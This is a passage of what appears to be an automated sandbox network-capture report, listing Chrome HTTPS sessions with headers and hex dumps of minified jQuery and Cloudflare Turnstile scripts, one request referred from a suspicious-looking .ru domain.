                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                        2024-12-18 01:10:30 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                        2024-12-18 01:10:31 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                        2024-12-18 01:10:31 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                        2024-12-18 01:10:31 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.1649730104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:31 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:32 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:32 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47692
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46120dd7c328-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:32 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.1649731104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:31 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/ HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: iframe
                                                                                        Referer: https://dva.dgkifyron.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:32 UTC1362INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 26678
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                        cross-origin-embedder-policy: require-corp
                                                                                        cross-origin-opener-policy: same-origin
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        origin-agent-cluster: ?1
                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        referrer-policy: same-origin
                                                                                        document-policy: js-profiling
                                                                                        2024-12-18 01:10:32 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 33 62 34 36 31 32 33 38 30 37 34 32 31 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8f3b461238074211-EWRalt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:32 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
